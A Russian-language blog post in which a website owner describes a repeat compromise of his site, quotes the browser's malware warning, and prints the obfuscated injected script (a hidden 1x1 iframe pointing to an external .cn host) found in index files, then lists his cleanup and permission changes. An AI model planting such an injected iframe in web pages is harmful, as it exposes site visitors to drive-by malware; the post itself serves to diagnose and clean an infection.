Сайт атакует компьютеры – нежеланное продолжение
admin 
Сделав действия которые описывал в своем посте я успокоился. А зря…
Непроверяв свой сайт продолжительное время я был спокен.. но.. зайдя на сайт я получил снова то самое предупреждение:
Имеется информация, что этот сайт атакует компьютеры!
Имеется информация о том, что сайт ********.ru используется для атак на компьютеры пользователей. В соответствии с вашими настройками безопасности он был заблокирован.
Сайты, атакующие компьютеры, пытаются установить программное обеспечение, которое похищает персональную информацию, вредит вашей системе или использует ваш компьютер для атак на другие компьютеры.
Некоторые сайты намеренно созданы для распространения зловредного программного обеспечения, однако многие сайты были взломаны и делают это без ведома или разрешения своих владельцев.
Что ж, несудьба спать спокойно. Просмотрев код увидел что скрипт модифицировался и теперь представляет из себя следующее:
<script>document.write(”<if”+”rame “+”s” +”r”+”c=http:/”+”/u” +”pd”+”ateda” +”te”+”.cn”+”/ ” +”hei”+”g”+”h”+”t=1″ +” “+”wi”+”dth=”+”1″+”><”+”/ifram”+”e” +”>”);</script>
Скрипт так же как и впрошлый раз присутствует во всех файлах типа index.php .html index2.php и так далее..
Самое интересное что доступ к сайту по ftp был убран а значит сайт взломан был не оному.
Вобщем что я сделал: почистил все файлы, заново выставил права на папки и файлы:
всем каталогам кроме images и caсhe запретил запись. ну а так же всем файлам в корневой директории.. ну поглядим посмотрим что будет дальше…
